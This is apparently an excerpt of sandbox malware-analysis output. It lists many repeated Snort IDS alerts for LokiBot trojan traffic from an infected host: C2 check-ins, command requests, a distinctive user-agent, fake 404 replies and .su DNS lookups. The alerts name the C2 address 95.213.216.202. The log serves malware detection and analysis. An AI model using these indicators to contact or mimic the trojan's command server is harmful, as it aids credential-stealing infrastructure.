Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49711 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49711 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 95.213.216.202:80 -> 192.168.2.6:49711
Source: Traffic	Snort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.6:59504 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49712 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49712 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49712 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49712 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49712 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 95.213.216.202:80 -> 192.168.2.6:49712
Source: Traffic	Snort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.6:65198 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49713 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49713 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49713 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49713 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49713 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 95.213.216.202:80 -> 192.168.2.6:49713
Source: Traffic	Snort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.6:62910 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49714 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49714 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49714 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49714 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49714 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 95.213.216.202:80 -> 192.168.2.6:49714
Source: Traffic	Snort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.6:63863 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49715 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49715 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49715 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49715 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49715 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 95.213.216.202:80 -> 192.168.2.6:49715
Source: Traffic	Snort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.6:63229 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49716 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49716 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49716 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49716 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49716 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 95.213.216.202:80 -> 192.168.2.6:49716
Source: Traffic	Snort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.6:54903 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49718 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49718 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49718 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49718 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49718 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 95.213.216.202:80 -> 192.168.2.6:49718
Source: Traffic	Snort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.6:51530 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49719 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49719 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49719 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49719 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49719 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 95.213.216.202:80 -> 192.168.2.6:49719
Source: Traffic	Snort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.6:56122 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49720 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49720 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49720 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49720 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49720 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 95.213.216.202:80 -> 192.168.2.6:49720
Source: Traffic	Snort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.6:52556 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49721 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49721 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49721 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49721 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49721 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 95.213.216.202:80 -> 192.168.2.6:49721
Source: Traffic	Snort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.6:61609 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49722 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49722 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49722 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49722 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49722 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 95.213.216.202:80 -> 192.168.2.6:49722
Source: Traffic	Snort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.6:52481 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49723 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49723 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49723 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49723 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49723 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 95.213.216.202:80 -> 192.168.2.6:49723
Source: Traffic	Snort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.6:53943 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49724 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49724 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49724 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49724 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49724 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 95.213.216.202:80 -> 192.168.2.6:49724
Source: Traffic	Snort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.6:56086 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49725 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49725 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49725 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49725 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49725 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 95.213.216.202:80 -> 192.168.2.6:49725
Source: Traffic	Snort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.6:56547 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49726 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49726 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49726 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49726 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49726 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 95.213.216.202:80 -> 192.168.2.6:49726
Source: Traffic	Snort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.6:59881 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49727 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49727 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49727 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49727 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49727 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 95.213.216.202:80 -> 192.168.2.6:49727
Source: Traffic	Snort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.6:58917 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49728 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49728 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49728 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49728 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49728 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 95.213.216.202:80 -> 192.168.2.6:49728
Source: Traffic	Snort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.6:50343 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49729 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49729 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49729 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49729 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49729 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 95.213.216.202:80 -> 192.168.2.6:49729
Source: Traffic	Snort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.6:62520 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49730 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49730 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49730 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49730 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49730 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 95.213.216.202:80 -> 192.168.2.6:49730
Source: Traffic	Snort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.6:55629 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49731 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49731 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49731 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49731 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49731 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 95.213.216.202:80 -> 192.168.2.6:49731
Source: Traffic	Snort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.6:52079 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49732 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49732 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49732 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49732 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49732 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 95.213.216.202:80 -> 192.168.2.6:49732
Source: Traffic	Snort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.6:56569 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49733 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49733 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49733 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49733 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49733 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 95.213.216.202:80 -> 192.168.2.6:49733
Source: Traffic	Snort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.6:61833 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49734 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49734 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49734 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49734 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49734 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 95.213.216.202:80 -> 192.168.2.6:49734
Source: Traffic	Snort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.6:65044 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49735 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49735 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49735 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49735 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49735 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 95.213.216.202:80 -> 192.168.2.6:49735
Source: Traffic	Snort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.6:60032 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49736 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49736 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49736 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49736 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49736 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 95.213.216.202:80 -> 192.168.2.6:49736
Source: Traffic	Snort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.6:49232 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49737 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49737 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49737 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49737 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49737 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 95.213.216.202:80 -> 192.168.2.6:49737
Source: Traffic	Snort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.6:56123 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49738 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49738 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49738 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49738 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49738 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 95.213.216.202:80 -> 192.168.2.6:49738
Source: Traffic	Snort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.6:59752 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49739 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49739 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49739 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49739 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49739 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 95.213.216.202:80 -> 192.168.2.6:49739
Source: Traffic	Snort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.6:52865 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49740 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49740 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49740 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49740 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49740 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 95.213.216.202:80 -> 192.168.2.6:49740
Source: Traffic	Snort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.6:57322 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49741 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49741 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49741 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49741 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49741 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 95.213.216.202:80 -> 192.168.2.6:49741
Source: Traffic	Snort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.6:62958 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49742 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49742 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49742 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49742 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49742 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 95.213.216.202:80 -> 192.168.2.6:49742
Source: Traffic	Snort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.2.6:64404 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49743 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49743 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49743 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49743 -> 95.213.216.202:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49743 -> 95.213.216.202:80
